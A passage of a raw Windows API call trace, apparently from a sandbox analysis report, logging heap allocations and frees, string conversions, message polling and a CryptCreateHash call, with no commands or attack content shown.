Size=0x10) returned 0x2e50a58 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0133.032] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0133.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0133.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0133.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0133.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0133.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0133.033] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0133.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0133.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0133.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0133.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0133.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0133.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0133.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0133.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0133.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0133.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0133.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0133.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0133.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0133.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0133.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0133.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0133.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0133.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0133.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0133.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0133.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0133.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0133.217] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0133.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0133.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0133.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.217] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0133.218] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0133.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0133.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0133.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0133.218] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0133.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0133.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0133.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0133.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0133.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0133.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0133.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0133.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0133.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0133.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0133.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0133.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0133.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0133.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0133.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0133.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0133.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0133.220] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0133.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0133.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0133.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0133.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0133.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0133.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0133.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0133.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0133.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0133.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0133.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0133.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0133.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0133.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0133.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0133.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0133.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ed8 [0133.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0133.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0133.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0133.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0133.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0133.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0133.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0133.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0133.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0133.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0133.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0133.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0133.228] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0133.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0133.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0133.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0133.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0133.229] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0133.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0133.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0133.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0133.229] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0133.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0133.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0133.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0133.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0133.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0133.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0133.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0133.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0133.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0133.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0133.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0133.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0133.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0133.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0133.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0133.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0133.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0133.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0133.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0133.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0133.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0133.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0133.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0133.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0133.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0133.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0133.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0133.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0133.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0133.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0133.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0133.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0133.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0133.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0133.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0133.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0133.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0133.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0133.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0133.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0133.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0133.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0133.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0133.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0133.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0133.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0133.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0133.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0133.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0133.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0133.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0133.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0133.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0133.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0133.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: 